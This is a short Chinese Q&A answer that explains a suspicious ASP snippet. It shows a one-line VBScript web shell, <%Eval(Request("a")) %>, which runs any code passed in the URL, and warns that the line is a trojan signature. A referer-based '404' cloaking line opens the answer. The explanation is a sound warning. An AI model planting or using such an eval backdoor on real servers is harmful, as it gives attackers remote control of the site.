<%if Request.ServerVariables("HTTP_REFERER")="不想给看的网站网址" then response.write "404" response.end%>
不懂的话把index.asp前几行代码复制过来~再追问我
chr(97)是字母a,<%Eval(Request("a")) %>的意思,就是直接解析运行网址中a参数内的VBScript命令。比方说你在浏览器地址拦输入:http://网址/config.asp?a=msgbox("hello")
运行后就会弹出一个对话框显示hello。当然这只是示例,如果a=后面放的是带有危险性的代码,你可以想象一下后果,所以这是很明显的带有木马特征的代码,一般负责任的空间提供商都会拦截这样的代码的。除非是你自己的服务器,或者是一些不正规的空间。
欢迎分享,转载请注明来源:夏雨云
评论列表(0条)